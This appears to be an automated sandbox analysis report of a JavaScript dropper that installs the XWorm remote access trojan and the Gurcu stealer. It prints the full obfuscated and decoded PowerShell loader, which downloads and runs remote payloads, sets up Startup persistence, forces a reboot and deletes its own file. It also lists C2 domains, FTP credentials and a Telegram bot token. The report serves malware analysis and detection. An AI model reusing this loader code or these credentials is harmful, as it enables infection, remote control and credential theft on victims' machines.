Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 20:53

General

  • Target

    MOT-DE-PASSE.js

  • Size

    24KB

  • MD5

    3568415c8644c0e6a231927bb26c3307

  • SHA1

    3cdece2baabd90c46b4b10d8fc14dfbbc7352651

  • SHA256

    914710d214497ca13da8f3ce50aae097c508ac9b45596c1728404a5a85258622

  • SHA512

    465238863185d29bede8da70f823d1ac78874768962a726b1262f65411547cd9d2502d78ea5633642b2a26cbeb754ea1c174d4fcf0229d99035fd5c0a98227fe

  • SSDEEP

    768:mUj6N48QwfUtVRd64neTcgc0N4DnW2N2Tcc4Hg/0IeSpQYQBcRRuv1mcifM+oQ4a:AfGefZD/MFiZ

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Extracted

Family

xworm

Version

5.0

C2

moneyluckwork.ddns.net:7000

moneyluck.duckdns.org:7000

Mutex

gGehVFEiZl8AfiDz

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA' + [char]66 + 'UAFEATQ' + [char]66 + 'kAEYAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAVA' + [char]66 + 'RAE0AZA' + [char]66 + 'GACAAKQAgAHsAJA' + [char]66 + 'NAGkAUg' + [char]66 + 'JAGQAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAKQAgAHsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAKAAkAFIAWQ' + [char]66 + 'FAGEARgAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAFIAWQ' + [char]66 + 'FAGEARgAgAD0AIAAoACQAUg' + [char]66 + 'ZAEUAYQ' + [char]66 + 'GACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAVQ' + [char]66 + 'SAEwASw' + [char]66 + 'CACwAIAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApACAAOwAkAEEAVQ' + [char]66 + 'yAEcARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAA9ACAAKAAgACQATQ' + [char]66 + 'pAFIASQ' + [char]66 + 'kACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAQQ' + [char]66 + 'VAHIARw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' + [char]66 + 'hAG4AYQ' + [char]66 + 'nAGUAcg' + [char]66 + 'dADoAOg' + [char]66 + 'TAGUAYw' + [char]66 + '1AHIAaQ' + [char]66 + '0AHkAUA' + [char]66 + 'yAG8AdA' + [char]66 + 'vAGMAbw' + [char]66 + 'sACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAVA' + [char]66 + '5AHAAZQ' + [char]66 + 'dADoAOg' + [char]66 + 'UAGwAcwAxADIAOwAkAGgAcA' + [char]66 + '4AGUAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'UAGUAeA' + [char]66 + '0AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nAF0AOgA6AFUAVA' + [char]66 + 'GADgAOwAkAGgAcA' + [char]66 + '4AGUALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACcAZA' + [char]66 + 'lAHYAZQ' + [char]66 + 'sAG8AcA' + [char]66 + 'lAHIAcA' + [char]66 + 'yAG8AMgAxADUANwA4AEoAcA' + [char]66 + 'AAEAAJwApADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAnAGYAdA' + [char]66 + 'wADoALwAvAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQAMQ' + [char]66 + 'AAGYAdA' + [char]66 + 'wAC4AZA' + [char]66 + 'lAHMAYw' + [char]66 + 'rAHYAYg' + [char]66 + 'yAGEAdAAuAGMAbw' + [char]66 + 'tAC4AYg' + [char]66 + 'yAC8AVQ' + [char]66 + 'wAGMAcg' + [char]66 + '5AHAAdA' + [char]66 + 'lAHIALwAwADIALw' + [char]66 + 'EAEwATAAwADEALg' + [char]66 + '0AHgAdAAnACAAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAGQAaQ' + [char]66 + 'zAHAAbw' + [char]66 + 'zAGUAKAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lACAAPQAgACgATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAgACkAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgACkALg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAHkAcA' + [char]66 + 'lACgAIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnAHAAcg' + [char]66 + 'GAFYASQAnACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcASw' + [char]66 + 'RAGQAVg' + [char]66 + 'jADYARwA2AC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'tAG8AYwAuAG4AaQ' + [char]66 + 'iAGUAdA' + [char]66 + 'zAGEAcAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgACwAIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAsACAAJw' + [char]66 + '0AHIAdQ' + [char]66 + 'lACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js') ;powershell $fLbjh
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4356
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$TQMdF = $host.Version.Major.Equals(2);If ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = ( New-Object Net.WebClient ) ;$yHJhx.Encoding = [System.Text.Encoding]::UTF8 ;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$hpxe.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$VtaAF = $hpxe.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$hpxe.dispose();$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $hpxe.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'KQdVc6G6/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js', 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
          4⤵
          • Adds Run key to start application
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4812
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js"
          4⤵
            PID:3592

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1

      Filesize

      232KB

      MD5

      cf594063c738ae07171e6c6edc8a1277

      SHA1

      3c47e47bc90a71a4255b72505bb50a84e3c2d712

      SHA256

      84a031eb8b28b80d6ee7ed4e870c6776cb1f12a1dead8c8aa033e9c675fca487

      SHA512

      6f2ea0b7f8f01240ff786bbc3c253d46e2ea0ea0c08657a2357147b17232e4ac5745a0ab8da2d73b7ab03bab89b4f219d74f6654d99e5fbba72b7b2d63080115

    • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

      Filesize

      334B

      MD5

      68fef3132ed2fe642c26e40cf12a66f7

      SHA1

      5797e4790462e87172916c01245c525c5ef89c5d

      SHA256

      3a9f97203fdedc7c5747d62d582e0a057a582acebbf56e099b87642404ad8ecb

      SHA512

      c4fe06b37961706f3503a2d5e120ad46023aa722ecc6778e0b31d979e5b813124fabe5c78858d485adbdfe34225d02f2e3d63fd78389ac7ddc6861380c9bc962

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      387eb7d3f9ac68be25ca2678748aab34

      SHA1

      b7ad87b56f5235279a590f47ddc10b4308d0378c

      SHA256

      9bea7a125ae2b802e05d853bf1dbdbdcc35dba622e90c1e28443d33b327765ee

      SHA512

      d900ae4a4ecd8a70eb278de5af07eb53534816c5fa04195ffdf5f2d4b7f614628fe22402b016cd8621bb3f9da1282d2730873b370aa2402a2b611b29046cd23a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      c1a54dd5a1ab44cc4c4afd42f291c863

      SHA1

      b77043ab3582680fc96192e9d333a6be0ae0f69d

      SHA256

      c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

      SHA512

      010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_felfokah.wxo.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1048-56-0x0000026B6A4D0000-0x0000026B6A4DA000-memory.dmp

      Filesize

      40KB

    • memory/4356-1-0x00000198F2D50000-0x00000198F2D72000-memory.dmp

      Filesize

      136KB

    • memory/4356-11-0x00007FF873D40000-0x00007FF874801000-memory.dmp

      Filesize

      10.8MB

    • memory/4356-12-0x00007FF873D40000-0x00007FF874801000-memory.dmp

      Filesize

      10.8MB

    • memory/4356-0-0x00007FF873D43000-0x00007FF873D45000-memory.dmp

      Filesize

      8KB

    • memory/4356-44-0x00007FF873D40000-0x00007FF874801000-memory.dmp

      Filesize

      10.8MB

    • memory/4744-22-0x00000207CDB80000-0x00000207CDB8A000-memory.dmp

      Filesize

      40KB

    • memory/4812-57-0x0000000000400000-0x0000000000410000-memory.dmp

      Filesize

      64KB

    • memory/4812-59-0x00000000050A0000-0x000000000513C000-memory.dmp

      Filesize

      624KB

    • memory/4812-60-0x00000000058F0000-0x0000000005E94000-memory.dmp

      Filesize

      5.6MB

    • memory/4812-61-0x00000000053F0000-0x0000000005456000-memory.dmp

      Filesize

      408KB

    • memory/4812-62-0x0000000005600000-0x0000000005692000-memory.dmp

      Filesize

      584KB

    • memory/4812-63-0x00000000061F0000-0x00000000061FA000-memory.dmp

      Filesize

      40KB

    • memory/4812-64-0x0000000007FC0000-0x0000000007FCE000-memory.dmp

      Filesize

      56KB